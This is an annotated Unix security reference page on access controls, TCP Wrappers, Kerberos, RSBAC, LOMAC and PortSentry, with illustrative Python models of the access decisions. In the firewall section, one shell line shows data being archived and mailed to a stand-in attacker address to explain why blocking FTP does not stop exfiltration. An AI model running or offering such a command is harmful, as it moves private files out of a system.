Unix-based systems have security problems fundamentally because:
Securing computer systems is a nontrivial task, and
Unix systems get challenged precisely because they are used for applications that need security.
People do not (or at least should not) use PC operating systems like MS-DOS or Windows 95 for applications that require information security, as they have no meaningful access controls at all. (They were never officially rated, but would fall into the TCSEC "D" level were anyone to certify at that level.) Microsoft is not a vendor of secure operating systems, even at their best. Windows NT was only secure for such purposes (i.e. "C2 certified" under TCSEC) if:
You ran the particular Compaq or Digital hardware models named in the evaluation,
You ran the particular version of Windows NT that was evaluated (3.5 with Service Pack 3),
You removed the floppy drive from the computer,
You removed network connectivity, and
You configured Windows NT exactly as the evaluation specified.
(The evaluator, incidentally, was the NSA's National Computer Security Center rather than NIST; a later evaluation of NT 4.0 with Service Pack 6a did cover a networked configuration.) Windows NT is largely useless for anything other than a network server, and thus removal of network connectivity makes it useless.
You can secure virtually any computer if you encase it in lead and concrete and place it at the bottom of the ocean. The computer is not likely to be too useful under such conditions, though.
A more recent evaluation (under the Common Criteria, at EAL4) has been done; it may be best understood by reference to Understanding the Windows EAL4 Evaluation, which tells us:
Security experts have been saying for years that the security of the Windows family of products is hopelessly inadequate. Now there is a rigorous government certification confirming this.
ftp://ftp.auscert.org.au/pub/auscert/papers/unix_security_checklist
TCP Wrappers: tcpd secures and monitors incoming service requests, providing an access-control layer around the network services that inetd starts (the ones named in /etc/services). Accesses may be logged, permitted, denied or redirected, all transparently to the remote user; the policy lives in /etc/hosts.allow and /etc/hosts.deny, and note that a service tcpd does not wrap is not protected by it.
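How tcpd reaches its decision is easier to see in code than in the manual page. The following is an added illustration, not tcpd's own code and not from this page: it models the hosts_access(5) evaluation order (a match in hosts.allow admits, otherwise a match in hosts.deny refuses, otherwise the connection is admitted) over a constructed pair of sample policy files. Only part of the real pattern syntax is covered (ALL, LOCAL, exact names, ".domain" suffixes, "10.1." prefixes, net/mask pairs and EXCEPT); the spawn/twist options are not.

```python
"""Simplified model of the access decision TCP Wrappers (tcpd) makes for an
incoming connection. Added illustration, not tcpd's own code. Order follows
hosts_access(5): hosts.allow match -> admit; hosts.deny match -> refuse;
no match -> admit. Subset of the pattern syntax only.
"""
import ipaddress
import re

def _match_pattern(pattern, name):
    if pattern == "ALL":
        return True
    if pattern == "LOCAL":                    # hostname without a dot: local domain
        return "." not in name
    if pattern.startswith("."):               # domain suffix, e.g. .example.com
        return name.endswith(pattern)
    if pattern.endswith("."):                 # address prefix, e.g. 192.168.1.
        return name.startswith(pattern)
    if "/" in pattern:                        # net/mask, e.g. 10.0.0.0/255.0.0.0
        try:
            return ipaddress.ip_address(name) in ipaddress.ip_network(pattern, strict=False)
        except ValueError:
            return False                      # a hostname never matches an address mask
    return pattern == name

def _match_list(spec, name):
    """'patterns [EXCEPT patterns]'; the EXCEPT part carves out exceptions."""
    head, _, tail = spec.partition("EXCEPT")
    included = any(_match_pattern(p, name) for p in re.split(r"[\s,]+", head.strip()) if p)
    excluded = any(_match_pattern(p, name) for p in re.split(r"[\s,]+", tail.strip()) if p)
    return included and not excluded

def _rules(text):
    """Strip comments and blank lines; each rule is 'daemon_list : client_list [: ...]'."""
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if line:
            fields = [f.strip() for f in line.split(":")]
            if len(fields) >= 2:
                yield fields[0], fields[1]

def _matches(text, daemon, client):
    return any(_match_list(d, daemon) and _match_list(c, client) for d, c in _rules(text))

def hosts_access(daemon, client, hosts_allow, hosts_deny):
    """True if tcpd would admit `client` (address or hostname) to `daemon`."""
    if _matches(hosts_allow, daemon, client):
        return True
    if _matches(hosts_deny, daemon, client):
        return False
    return True                               # no rule matched: access granted

# Constructed sample policy (not from any real host): ssh from two internal
# ranges minus one subnet, ftp only from the local domain, everything else denied.
HOSTS_ALLOW = """
sshd: 10.1. 192.168.0.0/255.255.0.0 EXCEPT 192.168.99.
in.ftpd: LOCAL
"""
HOSTS_DENY = "ALL: ALL\n"
```

The point worth remembering from the last line of hosts_access: with no matching rule the connection is admitted, so it is the "ALL: ALL" in hosts.deny that turns the wrappers into a default-deny control; a host with an empty hosts.deny is wide open to every wrapped service. Hostname patterns also depend on reverse DNS, which is why tcpd cross-checks forward and reverse lookups before trusting a name.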
Network Associates: vendors of the TIS Firewall Toolkit
Trusted Information Systems provides a freely usable (but not GPLed) set of tools for building firewalls out of application-level proxies. The design approach uses small, trustable components so that correctness can be verified both at the component level and at the "whole system" level. The source code has to be reviewable by the security team so that they can verify there are no "trap doors."
There's enough flexibility in the TIS tools that policy can be made restrictive ("fascist") when necessary and more permissive where appropriate. There's little sense in forbidding outgoing FTP connections, for instance, if outgoing mail is permitted: a user who wants to send data outside (and has mail access) can always turn it into email and mail it out:
echo 'filename' | cpio -o | uuencode filename.cpio | mail -s 'security breach' badguy@outside.example.com
Blocking a protocol does not block the data; only a policy on the content of outbound mail would do that.
SafeTP - Uses cryptographic connection negotiation to provide a secure alternative interoperable with FTP
Particularly directed at clarifying the terms used in the context of information security. Its definition of the word hacker is quite interesting.
A pretty decent introduction to security-related terminology.
Harris Computer Systems Corporation CX/SX Version 6.1.1 B1 Rating
Note that: "CX/SX is designed to be software compatible with CX/UX while adding additional security features. CX/SX provides the traditional Unix user-specified access controls of protection bits for discretionary access control. "
VTun Virtual Tunnels over TCP/IP
If you want a secure network connection from one site to another, and can only use the insecure Internet, use this to route traffic, encrypted, from a host at one end to a host at the other. The point of the exercise is that the tunnel is invisible to client machines on the LAN; they don't know the "tunnel" is there...
A B3 secure OS with a Multics-like security model, segmented demand-paged virtual memory, and a multi-layer ring-structure isolation mechanism. It provides a Unix API; an upcoming version is planned to provide a Linux-compatible API.
Mitre's Top 25 Vulnerability List
This lists the 25 "most attackable" kinds of questionable development pattern, i.e. the software weaknesses (each with a CWE identifier) behind the bugs most often exploited in practice.
Kerberos is a distributed authentication system originally developed at MIT. It allows users and services to authenticate themselves to one another. It uses strong cryptography to transmit authentication tickets that allow users to assert their identities in an unequivocal manner to services in order to gain access.
Once the user has logged in and been authenticated by some scheme (password or otherwise), they can request "tickets" for particular services from the ticket-granting server; a ticket is then presented to the service to establish access permission.
Tickets have a limited lifetime, typically hours. Within that lifetime a ticket may be reused, which limits the number of "ticket requests" that have to be made; but because the lifetime is limited, a nefarious interloper who obtains a "stolen ticket" has only that window, and only the one service the ticket names, in which to abuse it. (A ticket alone is not enough, either: with each use the client must present a fresh authenticator proving it holds the session key that was issued with the ticket.)
A number of pieces of network-related software running on Unix are "Kerberized;" this means that you may (perhaps optionally) authenticate access using Kerberos rather than via the traditional "UserID/Password" combination. This commonly includes telnet, the Unix "rlogin" tool suite, and X11. Some commercial software, including SAP R/3 , can use Kerberos as their authentication protocol. It is also quite common for infrastructure services such as IMAP mail servers, wikis, and instant messaging systems to allow using Kerberos for authentication.
A number of vendors sell libraries to integrate Kerberos authentication support into Unix and Windows applications.
Kerberos has been one of the most heavily used of the "single sign-on" solutions; it allows a single authentication to be used against multiple services, and does so fairly securely since password validation is done only against the Kerberos domain server. Individual servers/services do not need to have access to sensitive authentication data - they merely need to be able to forward requests for "tickets" to the authentication server.
Of course, by centralizing authentication to Kerberos, one must accept some risks:
The Kerberos authentication server represents a nice juicy "target"; if successfully attacked, the attacker may gain control over access to a large number of services.
Of course, in a well-managed Kerberized environment, some effort will go into protecting that target, so it shouldn't be an easy target.
The Kerberos service is the nexus of possible "denial of service" attacks; any interruption of its service will interrupt all other services that depend on it.
Again, this risk may be mitigated. But it still certainly must be considered.
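The ticket flow above, as an added illustration that is neither MIT Kerberos code nor code from this page. Real Kerberos encrypts the ticket under the service's long-term key and the reply to the user under a key derived from the user's password; here seal()/unseal() (a JSON body plus an HMAC tag) stand in for that encryption. That is enough to show the properties the text relies on: a service never sees the user's password, a stolen ticket works only against the named service and only until it expires, and the per-request authenticator stops a captured exchange from being replayed. The principal names, keys and timestamps are constructed for the demonstration.

```python
"""Toy model of the Kerberos ticket flow. Added illustration, not MIT
Kerberos code: seal()/unseal() (JSON + HMAC) stand in for encryption under
the named key, which real Kerberos performs with the service's or user's key.
"""
import hashlib
import hmac
import json
import os

CLOCK_SKEW = 300          # seconds of clock difference a service tolerates

def _mac(key, payload):
    return hmac.new(key, payload, hashlib.sha256).hexdigest()

def seal(key, body):
    """Stand-in for 'encrypt under key': a JSON body plus an HMAC tag."""
    payload = json.dumps(body, sort_keys=True)
    return {"payload": payload, "tag": _mac(key, payload.encode())}

def unseal(key, blob):
    """Returns the body, or None if the key is wrong or the blob was altered."""
    if not hmac.compare_digest(_mac(key, blob["payload"].encode()), blob["tag"]):
        return None
    return json.loads(blob["payload"])

class KDC:
    """Authentication / ticket-granting server: the only party holding every key."""
    def __init__(self, keys):
        self.keys = keys                                # principal -> secret key

    def issue(self, user, service, now, lifetime):
        """Ticket sealed for the service, plus the session key sealed for the
        user (who must know their own key, i.e. password, to read it)."""
        session_key = os.urandom(16).hex()
        ticket = {"client": user, "service": service, "session_key": session_key,
                  "start": now, "end": now + lifetime}
        reply = {"service": service, "session_key": session_key, "end": now + lifetime}
        return seal(self.keys[service], ticket), seal(self.keys[user], reply)

def client_session_key(user_key, reply_blob):
    """What the user's login/kinit does: recover the session key with its own key."""
    reply = unseal(user_key, reply_blob)
    return None if reply is None else bytes.fromhex(reply["session_key"])

def make_authenticator(user, session_key, now):
    """Fresh per-request proof that the client holds the session key."""
    return seal(session_key, {"client": user, "time": now})

class Service:
    """A kerberized server: knows only its own key, never any user's password."""
    def __init__(self, name, key):
        self.name, self.key = name, key
        self.seen = set()                               # replay cache of authenticators

    def accept(self, ticket_blob, auth_blob, now):
        ticket = unseal(self.key, ticket_blob)
        if ticket is None or ticket["service"] != self.name:
            return "bad ticket"                         # not ours, or tampered with
        if not ticket["start"] <= now <= ticket["end"]:
            return "ticket expired"
        auth = unseal(bytes.fromhex(ticket["session_key"]), auth_blob)
        if auth is None or auth["client"] != ticket["client"]:
            return "bad authenticator"
        if abs(now - auth["time"]) > CLOCK_SKEW:
            return "stale authenticator"
        if auth_blob["tag"] in self.seen:
            return "replay"
        self.seen.add(auth_blob["tag"])
        return "ok"

def demo():
    """Constructed scenario: one user, two services, a ten-minute ticket."""
    keys = {"alice": b"derived-from-alice-password",
            "telnet/host": os.urandom(16), "imap/host": os.urandom(16)}
    kdc = KDC(keys)
    telnet = Service("telnet/host", keys["telnet/host"])
    imap = Service("imap/host", keys["imap/host"])
    t0 = 1_000_000
    ticket, reply = kdc.issue("alice", "telnet/host", t0, lifetime=600)
    skey = client_session_key(keys["alice"], reply)
    first = make_authenticator("alice", skey, t0 + 1)
    return {
        "wrong_password": client_session_key(b"guess", reply),          # None
        "fresh": telnet.accept(ticket, first, t0 + 1),
        "replay": telnet.accept(ticket, first, t0 + 2),
        "reused_ticket": telnet.accept(ticket, make_authenticator("alice", skey, t0 + 300), t0 + 300),
        "expired": telnet.accept(ticket, make_authenticator("alice", skey, t0 + 700), t0 + 700),
        "wrong_service": imap.accept(ticket, make_authenticator("alice", skey, t0 + 5), t0 + 5),
    }
```

Two things the toy makes visible: the service's decision needs nothing but its own key and a clock, which is what lets the password stay on the KDC; and the clock matters, since a service whose clock drifts more than the permitted skew will reject everyone, which is why Kerberos sites run NTP.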
Designing an Authentication System: A Dialogue in Four Scenes
This essay explains the Kerberos protocol in "plain English".
Most of the design work associated with this will deal with the user tools (including packaging tools like RPM or dpkg), as it is useless to have sophisticated security components without sufficiently powerful tools to manage them...
Including a fairly decent two page Quick Reference Guide...
POSIX Access Control Lists (ACLs) for Linux
This is an effort to implement POSIX-like Access Control Lists for Linux.
This project takes an approach similar to Novell NetWare's notion of trustees: trustees are bound to files/directories and are used to grant or deny access to groups of users.
RSBAC is mostly a large patch for current Linux kernels. It is based on the Generalized Framework for Access Control (GFAC) by Abrams and LaPadula and provides a flexible system of access control built from several modules.
All security-relevant system calls are extended with security enforcement code. This code calls the central decision component, which in turn calls every active decision module and combines their answers into one decision, which the system call extension then enforces. Because the decision is taken centrally, a module that does not care about a given request cannot override another module's refusal.
A general goal of RSBAC is some day to reach the Orange Book (TCSEC) B1 level. For this, a number of special problems have been and will have to be addressed.
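The decision structure just described, as an added illustration (not RSBAC code and not from this page). Two simplified stand-ins for RSBAC's modules, a role-compatibility check and a file-flags check, each answer GRANTED, NOT_GRANTED or DO_NOT_CARE; the central decide() applies the conservative combination in which any NOT_GRANTED wins and abstentions do not. The role table, file attributes and paths are constructed sample state.

```python
"""Toy of the RSBAC/GFAC decision structure: one central decision point asks
every registered module and combines the verdicts. Added illustration, not
RSBAC code; modules are simplified stand-ins for RSBAC's RC and FF modules.
"""
GRANTED, NOT_GRANTED, DO_NOT_CARE = "GRANTED", "NOT_GRANTED", "DO_NOT_CARE"

# Constructed sample attribute store: which roles may do what to which object
# types, and per-file flags that hold no matter who asks.
ROLE_RIGHTS = {
    "web_server": {"html": {"READ"}, "log": {"APPEND"}},
    "admin": {"html": {"READ", "WRITE"}, "log": {"READ", "WRITE", "APPEND"},
              "secret": {"READ", "WRITE"}},
}
FILE_ATTRS = {
    "/var/www/index.html": {"type": "html", "flags": set()},
    "/var/log/httpd": {"type": "log", "flags": {"append_only"}},
    "/etc/shadow": {"type": "secret", "flags": {"read_only"}},
}

def rc_module(subject, request, target):
    """Role Compatibility: may the process's role make this request on this type?"""
    attrs = FILE_ATTRS.get(target)
    if attrs is None:
        return DO_NOT_CARE                    # object not under RC control
    allowed = ROLE_RIGHTS.get(subject["role"], {}).get(attrs["type"], set())
    return GRANTED if request in allowed else NOT_GRANTED

def ff_module(subject, request, target):
    """File Flags: object flags that apply regardless of subject, root included."""
    flags = FILE_ATTRS.get(target, {}).get("flags", set())
    if "read_only" in flags and request in {"WRITE", "APPEND"}:
        return NOT_GRANTED
    if "append_only" in flags and request == "WRITE":
        return NOT_GRANTED
    return DO_NOT_CARE

MODULES = [rc_module, ff_module]

def decide(subject, request, target):
    """Central decision component: collect every verdict; any denial wins."""
    verdicts = [module(subject, request, target) for module in MODULES]
    if NOT_GRANTED in verdicts:
        return NOT_GRANTED
    return GRANTED if GRANTED in verdicts else DO_NOT_CARE

def sys_open(subject, path, mode):
    """The 'system call extension': decide first, then do the (simulated) work."""
    request = {"r": "READ", "w": "WRITE", "a": "APPEND"}[mode]
    if decide(subject, request, path) == NOT_GRANTED:
        return "EPERM"
    return f"opened {path} for {request}"
```

The case to look at is the admin role (uid 0) writing /etc/shadow: the RC module grants it, the FF module refuses it because of the read_only flag, and the refusal wins. That is the difference between this and ordinary Unix permissions, where root is never refused.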
Linux-Privs - Adding VMS-like Capabilities/Privileges to Linux
Maximum Linux Security : A Hacker's Guide to Protecting Your Linux Server and Workstation
A discussion of security tips (from Randall Raemon):
With the thought of simply slowing down an attack, some more things that can be put to good use.
FreeVSD - Virtual Server Daemon
FreeVSD runs many virtual Linux servers on a single physical machine, each with the full Linux directory structure, its own IP address and its own view of the process table, so that web servers and other applications can be deployed and administered separately without compromising security.
VXE - Virtual eXecuting Environment
VXE (Virtual eXecuting Environment) protects Unix servers from intruders, network attacks and the like. It protects software subsystems such as SMTP, POP, HTTP and any other subsystem already installed on the server.
A VXE description (VXED) is a small LISP program (a set of functions) giving a declarative description of the acceptable parameters for different system calls. The VXED is loaded into the kernel, where it checks the system-call parameters used by the specified subsystem; VXEDs are thus dynamically loadable modules, run by a small LISP interpreter inserted into the kernel. In the current VXE version this is vxelisp, derived from RefLisp; vxelisp has a new internal bigstring representation and a full set of string and bit functions. The kernel version of vxelisp is reentrant, so that different VXEDs can be handled simultaneously. Note what that means for the trusted computing base: an interpreter now runs in kernel mode, so a bug in vxelisp is a kernel bug.
Yahoo - National Security Agency Selects Secure Computing to Provide Type Enforcement on Linux
This is effectively an outgrowth of the Flask security architecture, continuing the work of the Distributed Trusted Operating System (DTOS) project; the result was released as SELinux.
Sentry (PortSentry) is a program that protects computers running Linux from various break-in attempts and assaults. When it detects a port scan, it drops the attacker's IP address into the computer's /etc/hosts.deny file.
To detect a port scan, Sentry binds itself to various ports that are not otherwise in use, listed in the sentry.conf file in /etc.
When an attacker touches one of these ports, their address is immediately added to hosts.deny (so that TCP Wrappers refuses them from then on) and, optionally, given a black-hole route to a dead, non-existent host such as 333.444.555.666. The caveat with any automatic blocker: an attacker who scans with a forged source address can get that address blocked for you, so the hosts you cannot afford to lose (your DNS servers, your upstream router) belong on the ignore list.
Sentry has proven extremely effective against assaults. To give anecdotal evidence, a friend of mine who runs Linux and uses Sentry has now accumulated a 2 megabyte hosts.deny file.
Amongst other measures, I run portsentry, and have a sizable list of blocked hosts.
Using deception to counter security attacks: essentially, leaving apparent vulnerabilities in place to catch would-be attackers off guard, lulling them into a false sense of security through your apparent insecurity.
You might, for instance, run a fake service on port 25 that makes it appear you are running a terribly insecure version of Sendmail, while in reality you are toying with the attacker and collecting information on them.
One cute idea they have is to use a pseudo-Sendmail to tie up spam producers: if a connection comes in from a known spam source, you accept it and respond with an endless stream of continuation lines such as
250-This is Sendmail version 8.8.5
so that the spammer's software sits waiting for a final reply that never comes.
Note that this is not an attack; it is only initiated if they decide to connect to your server.
It is a bit of a paradox to slow down Internet connections in order to use them better, but at least is an entertaining paradox...
SUBTERFUGUE is a framework for observing and playing with the reality of software; it's a foundation for building tools to do tracing, sandboxing, and many other things. You could think of it as "strace meets expect".
Providing a hopefully-tidy way of getting at information about:
Security advisories
Articles on security
General Dynamics Mission Systems
Maker of Pitbull, a secure platform certified at the B1 level, which runs atop Linux.
LOMAC is a security enhancement for Linux that uses Low Water-Mark Mandatory Access Control to protect the integrity of processes and data from viruses, Trojan horses, malicious remote users, and compromised root daemons. It is implemented as a loadable kernel module; no kernel recompilation or change to existing applications is required. Although some features and fixes remain to be implemented, LOMAC presently provides enough protection to thwart script-kiddies and is stable enough for everyday use.
Superseded around 2002 by later work such as RSBAC.
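The Low Water-Mark rule LOMAC applies, as an added illustration (not LOMAC's code and not from this page). Two integrity levels, as in LOMAC: HIGH for the system's own files and daemons, LOW for anything that came from the network or an untrusted user. A subject may read anything, but reading LOW data drops it to LOW (its "water mark" only ever falls), and a LOW subject may not write HIGH objects. Root privilege does not enter into it, which is how a compromised root daemon is kept from trojaning system binaries. The paths and process IDs are constructed for the scenario.

```python
"""Low Water-Mark integrity, as used by LOMAC. Added illustration, not
LOMAC's code: two levels, reads demote the reader, writes need level >= object.
"""
HIGH, LOW = 2, 1

class Lomac:
    def __init__(self, object_levels):
        self.objects = dict(object_levels)      # path -> integrity level
        self.subjects = {}                      # pid -> current level
        self.log = []

    def spawn(self, pid, level=HIGH):
        self.subjects[pid] = level

    def read(self, pid, obj):
        """Reads always succeed, but may demote the reader (the low water mark)."""
        level = self.objects[obj]
        if level < self.subjects[pid]:
            self.log.append(f"pid {pid} demoted to {level} by reading {obj}")
            self.subjects[pid] = level
        return True

    def write(self, pid, obj):
        """Writes succeed only from a subject at or above the object's level."""
        if self.subjects[pid] < self.objects[obj]:
            self.log.append(f"pid {pid} denied write to {obj}")
            return False
        return True

    def create(self, pid, obj):
        """New objects take the creator's (possibly demoted) level."""
        self.objects[obj] = self.subjects[pid]
        return obj

def scenario():
    """Constructed sample: a root network daemon is compromised by its input."""
    m = Lomac({"/bin/login": HIGH, "/etc/passwd": HIGH, "/var/log/messages": HIGH,
               "net:tcp:80": LOW, "/home/guest/upload": LOW})
    m.spawn(100)                                  # root-owned daemon starts HIGH
    m.spawn(200)                                  # root process that never reads the net
    before = m.write(100, "/var/log/messages")    # still HIGH: allowed
    m.read(100, "net:tcp:80")                     # reads the attacker's request: demoted
    after = m.write(100, "/bin/login")            # attempt to trojan login: denied
    m.create(100, "/tmp/dropped.sh")              # whatever it drops is LOW too
    untouched = m.write(200, "/etc/passwd")       # the HIGH process is unaffected
    return {"before": before, "after": after, "untouched": untouched,
            "level_100": m.subjects[100],
            "dropped_level": m.objects["/tmp/dropped.sh"], "log": m.log}
```

The usability cost is built into the rule: the level only ever falls, so any long-lived daemon that must both read the network and update HIGH files needs an explicit exception, and the number of such exceptions is what decides how much protection a deployment actually gets.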
Generating a random password:
head -c 6 /dev/random | mmencode
(mmencode is metamail's base64 encoder; base64 from GNU coreutils does the same job. Six random bytes are 48 bits of entropy and encode to eight characters. On older kernels /dev/random blocks until the entropy pool has enough in it; /dev/urandom does not, and is fine for this purpose.)
SASL - Simple Authentication and Security Layer
A method for adding authentication support to connection-oriented protocols. It lets client and server negotiate any of a variety of existing mechanisms, including Kerberos (via GSSAPI). Some mechanisms can additionally negotiate a security layer that integrity-protects or encrypts the rest of the session, though in practice that job is usually left to TLS.
Protocols and projects using SASL include IMAP, SMTP (SMTP AUTH) and LDAP servers, with others likely in the future.
Configuring an IPSec Tunnel Between a Linux PC with the VPN 3000 Client and VPN 3000 Concentrator